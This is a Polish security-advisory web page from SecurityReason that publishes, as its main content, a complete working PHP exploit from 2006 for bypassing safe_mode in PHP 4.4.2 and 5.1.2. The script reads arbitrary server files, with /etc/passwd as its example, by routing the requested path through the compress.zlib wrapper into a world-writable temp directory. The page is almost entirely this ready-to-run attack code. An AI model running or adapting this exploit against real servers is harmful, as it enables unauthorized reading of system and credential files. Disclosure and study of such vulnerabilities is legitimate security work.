|
 |
 Polski  Angielski |
| SecurityReason | ||
| WLB | ||
| Audyt | ||
| RSS | ||
| Zespół | ||
| Informacja | ||
Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu: |
||
| Kategoria : SecurityReason Exploit | ||
 ExploitAlert : 8 Autor : Maksymilian Arciemowicz Data : 08.04.2006
Kod : <?php /* Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 by Maksymilian Arciemowicz SecurityReason.Com cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl pozdro sp3x */ $file=""; // File to Include... or use _GET _POST $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp echo "<PRE>\n"; if(empty($file)){ if(empty($_GET['file'])){ if(empty($_POST['file'])){ die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONT COLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>"); } else { $file=$_POST['file']; } } else { $file=$_GET['file']; } } $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$file, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "<B>--- Start File ".htmlspecialchars($file)." -------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File ".htmlspecialchars($file)." ---------------\n"; unlink($temp); die("\n<FONT COLOR=\"RED\"><B>File ".htmlspecialchars($file)." has been already loaded. SecurityReason Team ;]</B></FONT>"); } else { die("<FONT COLOR=\"RED\"><CENTER>Sorry... File <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>"); } ?> |
||
| Apache |  |
|
| PHP | |
|
| Patronat | ||
Szkolenia ISecMan
|
||
Szkolenia Multitrain
|
||
| Copyright © SecurityReason. All Rights Reserved. |